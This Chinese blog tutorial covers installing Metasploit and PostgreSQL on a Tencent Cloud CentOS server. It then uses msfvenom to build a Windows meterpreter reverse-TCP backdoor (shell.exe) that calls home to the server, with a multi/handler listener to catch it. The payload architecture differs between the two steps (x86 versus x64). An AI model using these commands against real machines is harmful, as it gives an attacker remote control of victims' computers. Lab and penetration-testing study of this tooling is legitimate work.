0


腾讯云服务器centos7.9搭建msf以及利用过程

一路踩坑过来,记录一下,愿世间不再有坑呜呜呜。

一、安装msf

在 /opt 目录下输入

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

安装好之后输入msfconsole,查看是否安装成功

二、安装Postgresql数据库

1.卸载旧版本Postgresql

虽然centos系统自带Postgresql数据库但是不能直接用(我也不知道为什么),所以需要先卸载。

yum remove postgresql*

2.安装新版Postgresql

(1)安装rpm文件

yum install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm

(2)安装客户端(一路默认y安装就行)

**yum install postgresql10 **

(3)安装服务端(一路默认y安装就行)

**yum install postgresql10-server **

(4)初始化

**/usr/pgsql-10/bin/postgresql-10-setup initdb **

(5)设置自动启动并且启动postgresql服务

systemctl enable postgresql-10

systemctl start postgresql-10

三、msf连接Postgresql

1.不能以root用户初始化数据库,创建一个用户msf对其初始化

(1)创建用户msf

useradd msf

(2)切换msf用户

su msf

(3)进入msf的bin目录

cd /opt/metasploit-framework/bin/

(4)初始化

./msfdb init

2.切换到root,用msf用户的数据库配置覆盖原配置

(1)切换root

su root

(2)覆盖原配置文件

cp /home/msf/.msf4/database.yml /opt/metasploit-framework/embedded/framework/config/

3.测试是否连接正常

进入msf,输入 db_status

四、msf利用

另外准备一台靶机,或者本机测试都可以

1.服务器开启端口

这里非常重要!腾讯云服务器除了在控制台需要开启端口外,宝塔也需要开!之前一直连不上,搞了老半天,结果是宝塔没开放端口。

2.msfvenonm生成windows后门木马

LHOST那里输入自己的服务器的公网IP,LPORT那里就输入自己在服务器开放的端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<公网IP> LPORT=<自己开放的端口>  -f  exe > shell.exe

这里呢会在当前目录得到一个shell.exe文件,如果只有250b的大小的话就是有问题的,需要重新检查一下语句

3.设置监听

进入到msf,输入以下语句:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp
set lhost <公网IP> #或者0.0.0.0
set lport <开放的端口>
exploit #run也可以

4.测试

将生成的shell.exe文件上传到靶机或本机上,点击运行,服务器上可以看到监听成功

参考文章:

centos搭建msf_MH cloud的博客-CSDN博客_centos安装msf


本文转载自: https://blog.csdn.net/weixin_48799157/article/details/125681202
版权归原作者 weixin_48799157 所有, 如有侵权,请联系我们删除。

“腾讯云服务器centos7.9搭建msf以及利用过程”的评论:

还没有评论